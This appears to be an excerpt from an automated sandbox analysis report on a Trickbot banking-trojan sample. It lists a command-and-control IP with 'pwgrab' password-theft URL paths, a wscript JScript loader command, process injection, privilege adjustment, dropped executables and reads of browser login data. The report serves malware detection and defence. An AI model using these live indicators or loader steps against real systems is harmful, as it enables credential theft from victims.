Source: svchost.exe, 00000012.00000002.56180117106.0000000002148000.00000004.00000001.sdmpString found in binary or memory: https://5.2.78.43/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/64/pwgrab/DPST/browser/8s
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmpString found in binary or memory: https://5.2.78.43/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/64/pwgrab/VERS/browser/:
Source: Login Data.bak.36.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search?ei=
Source: Login Data.bak.36.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49205
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49204
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49202
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49201
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49189
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49200
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49188
Source: unknownNetwork traffic detected: HTTP traffic on port 49202 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49189 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49200 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49209 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49204 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49207 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49206 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49195 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49197 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49191 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49199 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49199
Source: unknownNetwork traffic detected: HTTP traffic on port 49190 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49198
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49197
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49196
Source: unknownNetwork traffic detected: HTTP traffic on port 49188 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49195
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49194
Source: unknownNetwork traffic detected: HTTP traffic on port 49201 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49192
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49191
Source: unknownNetwork traffic detected: HTTP traffic on port 49205 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49190
Source: unknownNetwork traffic detected: HTTP traffic on port 49208 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49196 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49198 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49194 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49192 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49209
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49208
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49207
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49206

E-Banking Fraud:

barindex
Yara detected TrickbotShow sources
Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 284, type: MEMORY
Yara detected TrickbotShow sources
Source: Yara matchFile source: 00000012.00000002.56178609261.00000000003A7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 284, type: MEMORY

System Summary:

barindex
Wscript called in batch mode (surpress errors)Show sources
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' /B /E:JScript 'C:\Users\user\AppData\Local\Temp\431846743.hum'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' /B /E:JScript 'C:\Users\user\AppData\Local\Temp\431846743.hum'Jump to behavior
Abnormal high CPU UsageShow sources
Source: C:\Windows\System32\wscript.exeProcess Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)Show sources
Source: C:\Users\user\AppData\Local\Temp\431846743.exeMemory allocated: 76ED0000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\431846743.exeMemory allocated: 76FF0000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exeMemory allocated: 76ED0000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exeMemory allocated: 76FF0000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exeMemory allocated: 76ED0000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exeMemory allocated: 76FF0000 page execute and read and writeJump to behavior
Contains functionality to call native functionsShow sources
Source: C:\Windows\System32\svchost.exeCode function: 18_2_0006A2B0 NtQueryInformationProcess,18_2_0006A2B0
Contains functionality to launch a process as a different userShow sources
Source: C:\Windows\System32\svchost.exeCode function: 18_2_0007B420 LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,GetTokenInformation,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,AdjustTokenPrivileges,18_2_0007B420
Detected potential crypto functionShow sources
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0006B16014_2_0006B160
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0006118014_2_00061180
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0006598014_2_00065980
Source: C:\Windows\System32\svchost.exeCode function: 14_2_00066B6014_2_00066B60
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0007B42014_2_0007B420
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0007182014_2_00071820
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0006844014_2_00068440
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0006A48014_2_0006A480
Source: C:\Windows\System32\svchost.exeCode function: 14_2_000754B014_2_000754B0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_00062CCC14_2_00062CCC
Source: C:\Windows\System32\svchost.exeCode function: 14_2_00068CD014_2_00068CD0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_000788E014_2_000788E0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_000768F014_2_000768F0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0006C96014_2_0006C960
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0006BD8014_2_0006BD80
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0007D19014_2_0007D190
Source: C:\Windows\System32\svchost.exeCode function: 14_2_000649E014_2_000649E0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0007765014_2_00077650
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0006666014_2_00066660
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0007066014_2_00070660
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0007127014_2_00071270
Source: C:\Windows\System32\svchost.exeCode function: 14_2_000782C014_2_000782C0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_000756E014_2_000756E0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_00070EF014_2_00070EF0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0007C2F014_2_0007C2F0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0007AB1014_2_0007AB10
Source: C:\Windows\System32\svchost.exeCode function: 14_2_00061B5014_2_00061B50
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0006E76014_2_0006E760
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0006437014_2_00064370
Source: C:\Windows\System32\svchost.exeCode function: 14_2_00072FD014_2_00072FD0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_000737D014_2_000737D0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_000727E014_2_000727E0
Source: C:\Windows\System32\svchost.exeCode function: 18_2_0007B42018_2_0007B420
Source: C:\Windows\System32\svchost.exeCode function: 18_2_000768F018_2_000768F0
Source: C:\Windows\System32\svchost.exeCode function: 18_2_0006B16018_2_0006B160
Source: C:\Windows\System32\svchost.exeCode function: 18_2_0006C96018_2_0006C960
Source: C:\Windows\System32\svchost.exeCode function: 18_2_0006BD8018_2_0006BD80
Source: C:\Windows\System32\svchost.exeCode function: 18_2_0006118018_2_00061180
Source: C:\Windows\System32\svchost.exeCode function: 18_2_0006598018_2_00065980
Source: C:\Windows\System32\svchost.exeCode function: 18_2_0007066018_2_00070660
Source: C:\Windows\System32\svchost.exeCode function: 18_2_000782C018_2_000782C0
Source: C:\Windows\System32\svchost.exeCode function: 18_2_0007C2F018_2_0007C2F0
Source: C:\Windows\System32\svchost.exeCode function: 18_2_0007AB1018_2_0007AB10
Source: C:\Windows\System32\svchost.exeCode function: 18_2_00061B5018_2_00061B50
Source: C:\Windows\System32\svchost.exeCode function: 18_2_00066B6018_2_00066B60
Source: C:\Windows\System32\svchost.exeCode function: 18_2_0007182018_2_00071820
Source: C:\Windows\System32\svchost.exeCode function: 18_2_0006844018_2_00068440
Source: C:\Windows\System32\svchost.exeCode function: 18_2_0006A48018_2_0006A480
Source: C:\Windows\System32\svchost.exeCode function: 18_2_000754B018_2_000754B0
Source: C:\Windows\System32\svchost.exeCode function: 18_2_00062CCC18_2_00062CCC
Source: C:\Windows\System32\svchost.exeCode function: 18_2_00068CD018_2_00068CD0
Source: C:\Windows\System32\svchost.exeCode function: 18_2_000788E018_2_000788E0
Source: C:\Windows\System32\svchost.exeCode function: 18_2_0007D19018_2_0007D190
Source: C:\Windows\System32\svchost.exeCode function: 18_2_000649E018_2_000649E0
Source: C:\Windows\System32\svchost.exeCode function: 18_2_0007765018_2_00077650
Source: C:\Windows\System32\svchost.exeCode function: 18_2_0006666018_2_00066660
Source: C:\Windows\System32\svchost.exeCode function: 18_2_0007127018_2_00071270
Source: C:\Windows\System32\svchost.exeCode function: 18_2_000756E018_2_000756E0
Source: C:\Windows\System32\svchost.exeCode function: 18_2_00070EF018_2_00070EF0
Source: C:\Windows\System32\svchost.exeCode function: 18_2_0006E76018_2_0006E760
Source: C:\Windows\System32\svchost.exeCode function: 18_2_0006437018_2_00064370
Source: C:\Windows\System32\svchost.exeCode function: 18_2_000737D018_2_000737D0
Source: C:\Windows\System32\svchost.exeCode function: 18_2_00072FD018_2_00072FD0
Source: C:\Windows\System32\svchost.exeCode function: 18_2_000727E018_2_000727E0
Source: C:\Windows\System32\svchost.exeCode function: 21_2_0006B16021_2_0006B160
Source: C:\Windows\System32\svchost.exeCode function: 21_2_0006118021_2_00061180
Source: C:\Windows\System32\svchost.exeCode function: 21_2_0006598021_2_00065980
Source: C:\Windows\System32\svchost.exeCode function: 21_2_0007C2F021_2_0007C2F0
Source: C:\Windows\System32\svchost.exeCode function: 21_2_0007B42021_2_0007B420
Source: C:\Windows\System32\svchost.exeCode function: 21_2_0007182021_2_00071820
Source: C:\Windows\System32\svchost.exeCode function: 21_2_0006844021_2_00068440
Source: C:\Windows\System32\svchost.exeCode function: 21_2_0006A48021_2_0006A480
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000754B021_2_000754B0
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00062CCC21_2_00062CCC
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00068CD021_2_00068CD0
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000788E021_2_000788E0
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000768F021_2_000768F0
Source: C:\Windows\System32\svchost.exeCode function: 21_2_0006C96021_2_0006C960
Source: C:\Windows\System32\svchost.exeCode function: 21_2_0006BD8021_2_0006BD80
Source: C:\Windows\System32\svchost.exeCode function: 21_2_0007D19021_2_0007D190
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000649E021_2_000649E0
Source: C:\Windows\System32\svchost.exeCode function: 21_2_0007765021_2_00077650
Source: C:\Windows\System32\svchost.exeCode function: 21_2_0006666021_2_00066660
Source: C:\Windows\System32\svchost.exeCode function: 21_2_0007066021_2_00070660
Source: C:\Windows\System32\svchost.exeCode function: 21_2_0007127021_2_00071270
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000782C021_2_000782C0
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000756E021_2_000756E0
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00070EF021_2_00070EF0
Source: C:\Windows\System32\svchost.exeCode function: 21_2_0007AB1021_2_0007AB10
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00061B5021_2_00061B50
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00066B6021_2_00066B60
Source: C:\Windows\System32\svchost.exeCode function: 21_2_0006E76021_2_0006E760
Source: C:\Windows\System32\svchost.exeCode function: 21_2_0006437021_2_00064370
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00072FD021_2_00072FD0
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000737D021_2_000737D0
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000727E021_2_000727E0
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018007C99836_2_000000018007C998
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800949E036_2_00000001800949E0
Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000000180096D2036_2_0000000180096D20
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800796DC36_2_00000001800796DC
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800B175836_2_00000001800B1758
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800A7D2436_2_00000001800A7D24
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800BA05036_2_00000001800BA050
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800BA05036_2_00000001800BA050
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018000E07036_2_000000018000E070
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800AA07836_2_00000001800AA078
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800C40FC36_2_00000001800C40FC
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018003010836_2_0000000180030108
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018001015C36_2_000000018001015C
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800B617036_2_00000001800B6170
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018008E1F436_2_000000018008E1F4
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018004621836_2_0000000180046218
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800AA25436_2_00000001800AA254
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018001E27836_2_000000018001E278
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800AC32436_2_00000001800AC324
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018003434C36_2_000000018003434C
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800C836836_2_00000001800C8368
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018005837436_2_0000000180058374
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018005A41836_2_000000018005A418
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018003C42036_2_000000018003C420
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018002A56036_2_000000018002A560
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800A462436_2_00000001800A4624
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800966D036_2_00000001800966D0
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018005C73836_2_000000018005C738
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018008C76C36_2_000000018008C76C
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018000C87436_2_000000018000C874
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800928E836_2_00000001800928E8
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018006A93036_2_000000018006A930
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018006692C36_2_000000018006692C
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018004094836_2_0000000180040948
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800B496036_2_00000001800B4960
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018003098036_2_0000000180030980
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018005299036_2_0000000180052990
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800449D436_2_00000001800449D4
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018004EA9036_2_000000018004EA90
Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000000180018AE036_2_0000000180018AE0
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018005CAE436_2_000000018005CAE4
Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000000180088AE436_2_0000000180088AE4
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800CEB2C36_2_00000001800CEB2C
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800A8CA036_2_00000001800A8CA0
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800C2CB836_2_00000001800C2CB8
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800C8D0436_2_00000001800C8D04
Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000000180026D1836_2_0000000180026D18
Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000000180048ECC36_2_0000000180048ECC
Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000000180090F2836_2_0000000180090F28
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018007CF4036_2_000000018007CF40
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018005AF6836_2_000000018005AF68
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800C8F7C36_2_00000001800C8F7C
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018004CFAC36_2_000000018004CFAC
Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000000180050FF836_2_0000000180050FF8
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018000100C36_2_000000018000100C
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018008B09C36_2_000000018008B09C
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018006B0A436_2_000000018006B0A4
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800830B436_2_00000001800830B4
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800AB10436_2_00000001800AB104
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018009118036_2_0000000180091180
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018003D21436_2_000000018003D214
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800C325036_2_00000001800C3250
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018007F2B436_2_000000018007F2B4
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800832C436_2_00000001800832C4
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800A32FC36_2_00000001800A32FC
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018003136736_2_0000000180031367
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018008937036_2_0000000180089370
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800AF3B836_2_00000001800AF3B8
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018002F3E036_2_000000018002F3E0
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018008D42836_2_000000018008D428
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018007549C36_2_000000018007549C
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800434B036_2_00000001800434B0
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018005F50436_2_000000018005F504
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800A350436_2_00000001800A3504
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018009551436_2_0000000180095514
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800235C436_2_00000001800235C4
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018009B5EC36_2_000000018009B5EC
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018004D62836_2_000000018004D628
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800776A836_2_00000001800776A8
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800896B036_2_00000001800896B0
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018005771036_2_0000000180057710
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018009379836_2_0000000180093798
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800597C436_2_00000001800597C4
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800817D136_2_00000001800817D1
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018000F80036_2_000000018000F800
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018006984C36_2_000000018006984C
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018004987836_2_0000000180049878
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800838B836_2_00000001800838B8
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800C38FC36_2_00000001800C38FC
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800918F436_2_00000001800918F4
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018008792036_2_0000000180087920
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018005194836_2_0000000180051948
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800BF96036_2_00000001800BF960
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800219C836_2_00000001800219C8
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800AF9D436_2_00000001800AF9D4
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018006BA6036_2_000000018006BA60
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800BDAEC36_2_00000001800BDAEC
Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000000180029B2436_2_0000000180029B24
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800ABB7836_2_00000001800ABB78
Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000000180037B9436_2_0000000180037B94
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800D3BFC36_2_00000001800D3BFC
Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000000180087C0036_2_0000000180087C00
Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000000180095BF436_2_0000000180095BF4
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018005BC7436_2_000000018005BC74
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800A3C8836_2_00000001800A3C88
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018004FCC436_2_000000018004FCC4
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800ADD0036_2_00000001800ADD00
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800CDCFC36_2_00000001800CDCFC
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018005FD2036_2_000000018005FD20
Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000000180045D3836_2_0000000180045D38
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018003BE1836_2_000000018003BE18
Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000000180025E2836_2_0000000180025E28
Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000000180067E7836_2_0000000180067E78
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018000BEA436_2_000000018000BEA4
Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000000180065F9C36_2_0000000180065F9C
Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000000180087F9836_2_0000000180087F98
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800BFFBC36_2_00000001800BFFBC
Source: C:\Windows\System32\svchost.exeCode function: 39_2_0000000180001B4C39_2_0000000180001B4C
Source: C:\Windows\System32\svchost.exeCode function: 39_2_000000018000272039_2_0000000180002720
Found potential string decryption / allocating functionsShow sources
Source: C:\Windows\System32\svchost.exeCode function: String function: 000000018002AC08 appears 54 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 0000000180001804 appears 33 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 0000000180028A10 appears 39 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 000000018000F3E0 appears 41 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 000000018000F534 appears 153 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 000000018000FFC4 appears 124 times
PE file contains strange resourcesShow sources
Source: 431846743.exe.9.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: 431846743.exe.9.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: 431846743.exe.9.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: 431846743.exe.9.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: 431846743.exe.9.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: 231824723.exe.14.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: 231824723.exe.14.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: 231824723.exe.14.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: 231824723.exe.14.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: 231824723.exe.14.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Tries to load missing DLLsShow sources
Source: C:\Windows\System32\svchost.exeSection loaded: nss3.dllJump to behavior
Classification labelShow sources
Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winJSE@20/7@4/8
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Windows\System32\svchost.exeCode function: 18_2_0007B420 LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,GetTokenInformation,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,AdjustTokenPrivileges,18_2_0007B420
Source: C:\Windows\System32\svchost.exeCode function: 18_2_00072350 AdjustTokenPrivileges,RevertToSelf,CloseHandle,AdjustTokenPrivileges,CloseHandle,18_2_00072350
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800B1870 GetCurrentProcess,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,36_2_00000001800B1870
Contains functionality to enum processes or threadsShow sources
Source: C:\Windows\System32\svchost.exeCode function: 18_2_0006BA80 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,18_2_0006BA80
Contains functionality to instantiate COM classesShow sources
Source: C:\Windows\System32\svchost.exeCode function: 14_2_00077C20 CoCreateInstance,14_2_00077C20
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\AppData\Local\Temp\431846743.exeCode function: 13_2_004013F6 _EH_prolog,strlen,FindResourceA,strlen,atoi,atoi,VirtualAllocExNuma,atoi,VirtualAllocExNuma,#1134,#2621,#2514,#641,13_2_004013F6
Creates files inside the user directoryShow sources
Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Roaming\WinNetCoreJump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\789C000000010
Source: C:\Windows\System32\svchost.exeMutant created: \BaseNamedObjects\Global\789C000000010
Creates temporary filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\431846743.tumJump to behavior
Queries process information (via WMI, Win32_Process)Show sources
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Reads ini filesShow sources
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
SQL strings found in memory and binary dataShow sources
